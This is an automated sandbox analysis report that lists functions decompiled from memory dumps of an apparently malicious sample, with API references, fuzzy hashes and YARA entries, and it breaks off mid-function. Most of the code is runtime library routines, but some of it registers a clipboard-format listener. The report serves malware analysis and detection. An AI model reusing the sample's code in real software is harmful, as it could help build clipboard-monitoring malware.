Uniqueness

Uniqueness Score: -1.00%

Function 03F51432, Relevance: 3.1, APIs: 2, Instructions: 70sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FF), ref: 03F514EA
ExitProcess.KERNEL32 ref: 03F5151B

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ExitProcessSleep
String ID:
API String ID: 911557368-0
Opcode ID: 3cba515ef1b0025477a9b1a612f5c8343e66657d9cc6bfa69b3c4c800ba5d34d
Instruction ID: f4a2d538f774aead6dde548d4f5abcf2ec175dfea4d165ef61303f7858da1b70
Opcode Fuzzy Hash: 3cba515ef1b0025477a9b1a612f5c8343e66657d9cc6bfa69b3c4c800ba5d34d
Instruction Fuzzy Hash: 80217F749003069FCF04EFA4D944BDDBBB4FF09354F144A29FA15AB290DB756545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004098C0, Relevance: 3.0, APIs: 2, Instructions: 31
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004098C0(void* __ecx) {
				void* _t3;
				intOrPtr _t6;
				void* _t7;
				void* _t13;
				void* _t15;

				_t15 = __ecx;
				_t3 = E00409684(__ecx);
				_t13 = 0;
				if(_t3 != 0 && E00409768(__ecx) != 0) {
					_t6 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t6 != 0) {
						__imp__AddClipboardFormatListener(_t6);
						if(_t6 != 0) {
							_t7 =  *(__ecx + 0xc);
							if(_t7 != 0) {
								SetEvent(_t7);
							}
							E004097D2(_t15);
							_t13 = 1;
						}
					}
				}
				return _t13;
			}

0x004098c2
0x004098c4
0x004098c9
0x004098cd
0x004098da
0x004098df
0x004098e2
0x004098ea
0x004098ec
0x004098f1
0x004098f4
0x004098f4
0x004098fc
0x00409903
0x00409903
0x004098ea
0x004098df
0x00409908

APIs

Part of subcall function 00409684: GetClassInfoW.USER32 ref: 00409694
Part of subcall function 00409684: RegisterClassW.USER32 ref: 004096E0

Part of subcall function 00409768: IsWindow.USER32(?), ref: 00409773

AddClipboardFormatListener.USER32(?,?,?,004097B1), ref: 004098E2
SetEvent.KERNEL32(?,?,?,004097B1), ref: 004098F4

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Class$ClipboardEventFormatInfoListenerRegisterWindow
String ID:
API String ID: 3464740527-0
Opcode ID: 02d9d80ab5938a0cfe2da904ed90c36c3b534816f0c174a62174e5a0bc409502
Instruction ID: 320a9cced484dc0fe9b9786ce45efbba486e17cf0adedbb7b3b7b752d312fd1d
Opcode Fuzzy Hash: 02d9d80ab5938a0cfe2da904ed90c36c3b534816f0c174a62174e5a0bc409502
Instruction Fuzzy Hash: 23E0EDB23002515ADF24EA3A5804AAB63AD5EC1655304457FA9A6E73D3EE3DCC02C268

Uniqueness

Uniqueness Score: -1.00%

Function 03F59B10, Relevance: 3.0, APIs: 2, Instructions: 31clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 03F598D4: GetClassInfoW.USER32(?,?), ref: 03F598E4
Part of subcall function 03F598D4: RegisterClassW.USER32 ref: 03F59930

Part of subcall function 03F599B8: IsWindow.USER32(?), ref: 03F599C3

AddClipboardFormatListener.USER32(?), ref: 03F59B32
SetEvent.KERNEL32(?,?,?,03F59A01), ref: 03F59B44

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: Class$ClipboardEventFormatInfoListenerRegisterWindow
String ID:
API String ID: 3464740527-0
Opcode ID: 02d9d80ab5938a0cfe2da904ed90c36c3b534816f0c174a62174e5a0bc409502
Instruction ID: d743c33467c14d43987c1b325f54120075f5b692ca13d41921142eccffa39646
Opcode Fuzzy Hash: 02d9d80ab5938a0cfe2da904ed90c36c3b534816f0c174a62174e5a0bc409502
Instruction Fuzzy Hash: 91E09221B04342A26F3CEB3A5C04EABB39F5FC14413081028BE19CB341EFA4C50AC261

Uniqueness

Uniqueness Score: -1.00%

Function 0040A45B, Relevance: 1.6, APIs: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040A45B(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				signed int _t73;
				intOrPtr* _t77;
				signed int _t80;
				signed int _t85;
				signed int _t86;
				intOrPtr* _t88;
				signed int _t91;
				signed int _t94;

				_t85 = __edx;
				 *0x42324c =  *0x42324c & 0x00000000;
				 *0x4228e0 =  *0x4228e0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L22:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t69);
				_t88 =  &_v40;
				asm("cpuid");
				_t70 = _t69;
				 *_t88 = 0;
				 *((intOrPtr*)(_t88 + 4)) = _t69;
				 *((intOrPtr*)(_t88 + 8)) = 0;
				 *(_t88 + 0xc) = _t85;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t70);
				asm("cpuid");
				_t72 =  &_v40;
				 *_t72 = 1;
				 *((intOrPtr*)(_t72 + 4)) = _t70;
				 *((intOrPtr*)(_t72 + 8)) = 0;
				 *(_t72 + 0xc) = _t85;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t91 =  *0x423250; // 0x2
					L10:
					_t80 = _v32;
					_t57 = 7;
					_v8 = _t80;
					if(_v16 < _t57) {
						_t73 = _v20;
					} else {
						_push(_t72);
						asm("cpuid");
						_t77 =  &_v40;
						 *_t77 = _t57;
						 *((intOrPtr*)(_t77 + 4)) = _t72;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						_t80 = _v8;
						 *(_t77 + 0xc) = _t85;
						_t73 = _v36;
						if((_t73 & 0x00000200) != 0) {
							 *0x423250 = _t91 | 0x00000002;
						}
					}
					_t58 =  *0x4228e0; // 0x6f
					_t59 = _t58 | 0x00000002;
					 *0x42324c = 1;
					 *0x4228e0 = _t59;
					if((_t80 & 0x00100000) != 0) {
						_t60 = _t59 | 0x00000004;
						 *0x42324c = 2;
						 *0x4228e0 = _t60;
						if((_t80 & 0x08000000) != 0 && (_t80 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t60;
							_v20 = _t85;
							_t86 = 6;
							if((_v24 & _t86) == _t86) {
								_t63 =  *0x4228e0; // 0x6f
								_t64 = _t63 | 0x00000008;
								 *0x42324c = 3;
								 *0x4228e0 = _t64;
								if((_t73 & 0x00000020) != 0) {
									 *0x42324c = 5;
									_t65 = _t64 | 0x00000020;
									 *0x4228e0 = _t65;
									if((_t73 & 0xd0030000) == 0xd0030000) {
										 *0x42324c = _t86;
										 *0x4228e0 = _t65 | 0x00000040;
									}
								}
							}
						}
					}
					goto L22;
				}
				_t68 = _v40 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x423250; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x423250 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0040a45b
0x0040a45e
0x0040a468
0x0040a478
0x0040a617
0x0040a61a
0x0040a61a
0x0040a47e
0x0040a484
0x0040a489
0x0040a48d
0x0040a491
0x0040a492
0x0040a494
0x0040a497
0x0040a49c
0x0040a4a5
0x0040a4b6
0x0040a4c1
0x0040a4c7
0x0040a4c8
0x0040a4cd
0x0040a4d0
0x0040a4d5
0x0040a4dd
0x0040a4e0
0x0040a4e3
0x0040a528
0x0040a528
0x0040a52e
0x0040a52e
0x0040a533
0x0040a534
0x0040a53a
0x0040a56b
0x0040a53c
0x0040a53e
0x0040a53f
0x0040a544
0x0040a547
0x0040a549
0x0040a54c
0x0040a54f
0x0040a552
0x0040a555
0x0040a55e
0x0040a563
0x0040a563
0x0040a55e
0x0040a56e
0x0040a573
0x0040a576
0x0040a580
0x0040a58b
0x0040a591
0x0040a594
0x0040a59e
0x0040a5a9
0x0040a5b5
0x0040a5b8
0x0040a5bb
0x0040a5c6
0x0040a5cb
0x0040a5cd
0x0040a5d2
0x0040a5d5
0x0040a5df
0x0040a5e7
0x0040a5ee
0x0040a5f8
0x0040a5fd
0x0040a604
0x0040a609
0x0040a60f
0x0040a60f
0x0040a604
0x0040a5e7
0x0040a5cb
0x0040a5a9
0x00000000
0x0040a616
0x0040a4e8
0x0040a4f2
0x0040a517
0x0040a51d
0x0040a520
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A471

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3ff421720ac319bec11445499afa0b4085b97012c6a357dd3e04237ac3fe18f0
Instruction ID: 7d559f9aa6c40a98269c6a556edcf9b35802e5460816cb5a57f37812334a4d14
Opcode Fuzzy Hash: 3ff421720ac319bec11445499afa0b4085b97012c6a357dd3e04237ac3fe18f0
Instruction Fuzzy Hash: 1E516DB1A003059BDB28CF59DD852AABBF0FB88304F18897AD805EB390D379D911CF65

Uniqueness

Uniqueness Score: -1.00%

Function 03F59AC0, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?,03F599A2,?,?,?), ref: 03F59B07

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: e0d9565b746f0d0ad61c97197d25c802e509bd2a31c0701ea67337ffa6b49173
Instruction ID: 1e09fe47e5b83c416b60b0a59dbd30b7a2aacfa981f63a5e3aa12b3c8ff35d5a
Opcode Fuzzy Hash: e0d9565b746f0d0ad61c97197d25c802e509bd2a31c0701ea67337ffa6b49173
Instruction Fuzzy Hash: 58E01A39904101EAEA2AC755C9C4A1FB66EE790310F2CC826FE85C4064CBF5C4509AB3

Uniqueness

Uniqueness Score: -1.00%

Function 004095A8, Relevance: 1.5, APIs: 1, Instructions: 10clipboardCOMMON

Download Yara Rule

APIs

RemoveClipboardFormatListener.USER32(?), ref: 004095B0

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ClipboardFormatListenerRemove
String ID:
API String ID: 496146288-0
Opcode ID: dc1c417e2fe91bf68f031c64b07f9a3a44c41f6415d12c829f0c34fdc23b5402
Instruction ID: 1f54d2892f30f3745dd74f4622de1a0ee845a125ef387982cfa0625bb31ddbe5
Opcode Fuzzy Hash: dc1c417e2fe91bf68f031c64b07f9a3a44c41f6415d12c829f0c34fdc23b5402
Instruction Fuzzy Hash: 7FB09270301201ABDF109E369E48A1B3BAC5E40A8171C44B87808D6192EB38CC41E969

Uniqueness

Uniqueness Score: -1.00%

Function 004097BA, Relevance: 1.5, APIs: 1, Instructions: 10clipboardCOMMON

Download Yara Rule

APIs

AddClipboardFormatListener.USER32(?), ref: 004097C2

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ClipboardFormatListener
String ID:
API String ID: 2204065796-0
Opcode ID: 3d1f43418e51e6b4db385c1510eb2aa55473c488d096d8fa4e33164aebe9ca6f
Instruction ID: a7edbcefadec23b369c5cb9175f11b6fa29945e3f104631e4e03e4da5fae1d22
Opcode Fuzzy Hash: 3d1f43418e51e6b4db385c1510eb2aa55473c488d096d8fa4e33164aebe9ca6f
Instruction Fuzzy Hash: 52B092A0325201A7EF208E319F4871B26AD5E40A8571844B87808D6196EB38CC12E565

Uniqueness

Uniqueness Score: -1.00%

Function 03F59A0A, Relevance: 1.5, APIs: 1, Instructions: 10clipboardCOMMON

Download Yara Rule

APIs

AddClipboardFormatListener.USER32(?), ref: 03F59A12

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ClipboardFormatListener
String ID:
API String ID: 2204065796-0
Opcode ID: 3d1f43418e51e6b4db385c1510eb2aa55473c488d096d8fa4e33164aebe9ca6f
Instruction ID: fcfbe5464e69b101ca0d3fbc97767bb5eda163a4d3a7b34d2311aedc8fc81cfb
Opcode Fuzzy Hash: 3d1f43418e51e6b4db385c1510eb2aa55473c488d096d8fa4e33164aebe9ca6f
Instruction Fuzzy Hash: CFB09260705202A7AF24CE319F0871B26AD5E4058172844A87908D5056EB28C812A561

Uniqueness

Uniqueness Score: -1.00%

Function 03F597F8, Relevance: 1.5, APIs: 1, Instructions: 10clipboardCOMMON

Download Yara Rule

APIs

RemoveClipboardFormatListener.USER32(?), ref: 03F59800

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ClipboardFormatListenerRemove
String ID:
API String ID: 496146288-0
Opcode ID: dc1c417e2fe91bf68f031c64b07f9a3a44c41f6415d12c829f0c34fdc23b5402
Instruction ID: a0b4d0896336046e65406ca90ca41a0e22521fc9e98a89c08efba28edf02d709
Opcode Fuzzy Hash: dc1c417e2fe91bf68f031c64b07f9a3a44c41f6415d12c829f0c34fdc23b5402
Instruction Fuzzy Hash: 5EB09270701202ABDF149E31AE48A1B2BEC5E40A8272C44B87808C6091EB28C841A565

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33C, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33C() {

				return SetUnhandledExceptionFilter(E0040A348);
			}

0x0040a347

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A348,00409C33), ref: 0040A341

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ce77684b4589b0a63b3b626bb1058ab23523eb98d5b07e82c9e502e5c3be2955
Instruction ID: a40b97491e1cde747961c49c38e56c1dc04c6a177ecfb99fefb3730f80083ac0
Opcode Fuzzy Hash: ce77684b4589b0a63b3b626bb1058ab23523eb98d5b07e82c9e502e5c3be2955
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03F5A58C, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0040A348,03F59E83), ref: 03F5A591

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ce77684b4589b0a63b3b626bb1058ab23523eb98d5b07e82c9e502e5c3be2955
Instruction ID: a40b97491e1cde747961c49c38e56c1dc04c6a177ecfb99fefb3730f80083ac0
Opcode Fuzzy Hash: ce77684b4589b0a63b3b626bb1058ab23523eb98d5b07e82c9e502e5c3be2955
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041178C, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041178C() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x423bf0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0041178c
0x00411794
0x0041179c

APIs

GetProcessHeap.KERNEL32 ref: 0041178C

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4dee3c8acac9d1376fa517254c96a59b562cd05467ba50286f3ecc5b7af5dde8
Instruction ID: f9921de0367138ee16629b6288f55549ec654ba42340dc60b0ac6e544fd36454
Opcode Fuzzy Hash: 4dee3c8acac9d1376fa517254c96a59b562cd05467ba50286f3ecc5b7af5dde8
Instruction Fuzzy Hash: A5A011383002028FC3208F38AA0A2083EF8AA08282B0280B8B008C8030EB2880008A08

Uniqueness

Uniqueness Score: -1.00%

Function 00410FD2, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410FD2(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x422f18) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0040F096(_t46);
							E00410B8B( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0040F096(_t47);
							E00410C89( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0040F096( *((intOrPtr*)(_t74 + 0x7c)));
						E0040F096( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0040F096( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0040F096( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0040F096( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0040F096( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00411143( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x422f10) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0040F096(_t31);
							E0040F096( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0040F096(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0040F096(_t74);
			}

0x00410fda
0x00410fde
0x00410fe6
0x00410fef
0x00410ff4
0x00410ffb
0x00411003
0x0041100b
0x00411016
0x0041101c
0x0041101d
0x00411025
0x0041102d
0x00411038
0x0041103e
0x00411042
0x0041104d
0x00411053
0x00410ff4
0x00411054
0x0041105c
0x0041106f
0x00411082
0x00411090
0x0041109b
0x004110a0
0x004110a9
0x004110b1
0x004110b2
0x004110b8
0x004110bb
0x004110be
0x004110c5
0x004110c7
0x004110cb
0x004110d3
0x004110da
0x004110e0
0x004110e1
0x004110e1
0x004110e8
0x004110ea
0x004110ef
0x004110f7
0x004110fc
0x004110fd
0x004110fd
0x00411100
0x00411103
0x00411106
0x00411109
0x00411109
0x00411119

APIs

___free_lconv_mon.LIBCMT ref: 00411016

Part of subcall function 00410B8B: _free.LIBCMT ref: 00410BA8
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410BBA
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410BCC
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410BDE
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410BF0
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C02
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C14
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C26
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C38
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C4A
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C5C
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C6E
Part of subcall function 00410B8B: _free.LIBCMT ref: 00410C80

_free.LIBCMT ref: 0041100B

Part of subcall function 0040F096: HeapFree.KERNEL32(00000000,00000000,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?), ref: 0040F0AC
Part of subcall function 0040F096: GetLastError.KERNEL32(?,?,00410D1C,?,00000000,?,?,?,00410D43,?,00000007,?,?,00411169,?,?), ref: 0040F0BE

_free.LIBCMT ref: 0041102D
_free.LIBCMT ref: 00411042
_free.LIBCMT ref: 0041104D
_free.LIBCMT ref: 0041106F
_free.LIBCMT ref: 00411082
_free.LIBCMT ref: 00411090
_free.LIBCMT ref: 0041109B
_free.LIBCMT ref: 004110D3
_free.LIBCMT ref: 004110DA
_free.LIBCMT ref: 004110F7
_free.LIBCMT ref: 0041110F

Strings

h/B, xrefs: 00410FE8

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h/B
API String ID: 161543041-860576603
Opcode ID: 9a712216658376cc05218721ebd9ac3a863af1b8cbd1920b6e04bdb985dc5efc
Instruction ID: c9eaa26e3e8cb209981fe7504f72502cd30095a89e096acb2213ae9708f54ac5
Opcode Fuzzy Hash: 9a712216658376cc05218721ebd9ac3a863af1b8cbd1920b6e04bdb985dc5efc
Instruction Fuzzy Hash: 7F314F31A043409FDB30AB39D945B9777E4AB04354F10443FE259E6AA2EB79A8C48B18

Uniqueness

Uniqueness Score: -1.00%

Function 03F61222, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 03F61266

Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60DF8
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E0A
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E1C
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E2E
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E40
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E52
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E64
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E76
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E88
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60E9A
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60EAC
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60EBE
Part of subcall function 03F60DDB: _free.LIBCMT ref: 03F60ED0

_free.LIBCMT ref: 03F6125B

Part of subcall function 03F5F2E6: HeapFree.KERNEL32(00000000,00000000,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?), ref: 03F5F2FC
Part of subcall function 03F5F2E6: GetLastError.KERNEL32(?,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?,?), ref: 03F5F30E

_free.LIBCMT ref: 03F6127D
_free.LIBCMT ref: 03F61292
_free.LIBCMT ref: 03F6129D
_free.LIBCMT ref: 03F612BF
_free.LIBCMT ref: 03F612D2
_free.LIBCMT ref: 03F612E0
_free.LIBCMT ref: 03F612EB
_free.LIBCMT ref: 03F61323
_free.LIBCMT ref: 03F6132A
_free.LIBCMT ref: 03F61347
_free.LIBCMT ref: 03F6135F

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9a712216658376cc05218721ebd9ac3a863af1b8cbd1920b6e04bdb985dc5efc
Instruction ID: 63536379e3fa17d382814a7126585aba54b943bb339c2330c4b2eb1547cbbbac
Opcode Fuzzy Hash: 9a712216658376cc05218721ebd9ac3a863af1b8cbd1920b6e04bdb985dc5efc
Instruction Fuzzy Hash: 84317C75A04346DFEB30EA78DD44B6AB7E9AF40250F28846DE54ADB190DF30E840CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040C221, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040C221(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;

				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E0040D1CA(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E0040E8C3(_t274, _t279, _t303, _t308, _t322);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_push(_t308);
						_t205 = E0040BEDC(_t275, _t279, _t303, _t308, _t322);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t322 = _t205;
							_t225 = E0040BEDC(_t275, _t279, _t303, 0, _t322);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E0040AC81(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E0040ABB3(_t275, _t279, 0, _t322,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E0040C1A1(_t305, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
